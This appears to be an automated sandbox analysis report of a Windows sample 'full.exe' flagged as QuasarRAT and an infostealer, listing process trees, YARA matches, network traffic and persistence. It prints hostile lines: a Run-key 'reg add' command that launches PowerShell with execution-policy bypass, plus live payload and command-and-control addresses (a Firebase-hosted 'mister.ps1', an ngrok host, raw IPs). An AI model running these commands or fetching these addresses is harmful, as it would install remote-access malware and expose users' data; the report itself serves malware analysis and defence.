%v=%v,expiresrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCONNECTEd25519scheme FirefoxMeshIosnotepad#%d: %sSHA-224SHA-256SHA-384SHA-512avx512f19531259765625MD5-RSAserial:forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                Source: Yara matchFile source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.9:49709 -> 18.231.236.52:20545
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: ipwho.is
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: 1.tcp.sa.ngrok.io
                Source: global trafficDNS traffic detected: DNS query: ipwho.is
                Source: full.exe, 00000000.00000000.1450796283.0000000000C04000.00000008.00000001.01000000.00000003.sdmp, full.exe, 00000000.00000002.2092467323.0000000000C10000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
                Source: full.exe, 00000000.00000000.1450796283.0000000000C04000.00000008.00000001.01000000.00000003.sdmp, full.exe, 00000000.00000002.2092467323.0000000000C10000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
                Source: full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://192.95.0.175:3003/loginhttp:
                Source: full.exe, 00000000.00000000.1450796283.0000000000C04000.00000008.00000001.01000000.00000003.sdmp, full.exe, 00000000.00000002.2092467323.0000000000C10000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
                Source: full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/search-ac67b.appspot.com/o/mister.ps1?alt=media&token=e6
                Source: full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://groups.flytap.com/FlyGroups_UI/Entry.aspx?OriginalURL=https://groups.flytap.com/FlyGroups_UI
                Source: full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://groups.flytap.comtls:
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownHTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.9:49711 version: TLS 1.2

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.1946047934.0000000003036000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1913763802.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1736823660.0000020C23375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1946047934.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1913763802.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4452, type: MEMORYSTR

                System Summary

                barindex
                Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_013EF03C8_2_013EF03C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0786A6208_2_0786A620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0786CAC08_2_0786CAC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_07866D888_2_07866D88
                Source: full.exeStatic PE information: Number of sections : 15 > 10
                Source: C:\Users\user\Desktop\full.exeProcess created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f
                Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: full.exeStatic PE information: Section: /19 ZLIB complexity 1.0002911768922018
                Source: full.exeStatic PE information: Section: /32 ZLIB complexity 0.9949742168114144
                Source: full.exeStatic PE information: Section: /65 ZLIB complexity 0.9996467816026228
                Source: full.exeStatic PE information: Section: /78 ZLIB complexity 0.9941019666554206
                Source: classification engineClassification label: mal100.troj.evad.winEXE@20/11@2/2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3368:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3596:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\Local\a888ff96-3c09-47a6-9d99-754a5cdfdb56
                Source: C:\Users\user\Desktop\full.exeFile created: C:\Users\user\AppData\Local\Temp\Adobe.ps1Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat" "
                Source: full.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\full.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\full.exe "C:\Users\user\Desktop\full.exe"
                Source: C:\Users\user\Desktop\full.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\full.exeProcess created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f
                Source: C:\Users\user\Desktop\full.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat" "
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                Source: C:\Users\user\Desktop\full.exeProcess created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /fJump to behavior
                Source: C:\Users\user\Desktop\full.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat" "Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhostJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\full.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: full.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: full.exeStatic file information: File size 17277440 > 1048576
                Source: full.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x564600
                Source: full.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x52d400
                Source: full.exeStatic PE information: Raw size of /65 is bigger than: 0x100000 < 0x199e00
                Source: full.exeStatic PE information: Raw size of /78 is bigger than: 0x100000 < 0x115e00
                Source: full.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: full.exeStatic PE information: section name: .xdata
                Source: full.exeStatic PE information: section name: /4
                Source: full.exeStatic PE information: section name: /19
                Source: full.exeStatic PE information: section name: /32
                Source: full.exeStatic PE information: section name: /46
                Source: full.exeStatic PE information: section name: /65
                Source: full.exeStatic PE information: section name: /78
                Source: full.exeStatic PE information: section name: /90
                Source: full.exeStatic PE information: section name: .symtab
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_013E7279 push ecx; iretd 8_2_013E7297
                Source: 5.2.powershell.exe.20c2333afa8.1.raw.unpack, rudun.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'pe', 'QpoHmUNRHcmvRUnpNC', 'E3bT3Xq19PAL2CMkGh', 'wM3amNHVylONQ8eC9s', 'mVri2PMNOEg3kLlTUX', 'pLGfHtPKnvo6kRfT1e', 'W7bQcKe3LhGBgX5N7J'

                Persistence and Installation Behavior

                barindex
                Source: C:\Users\user\Desktop\full.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\Desktop\full.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior

                Boot Survival

                barindex
                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePS1 NULL powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\Adobe.ps1"Jump to behavior
                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePS1 NULLJump to behavior
                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePS1 NULLJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\full.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\full.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\full.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\full.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\Desktop\full.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
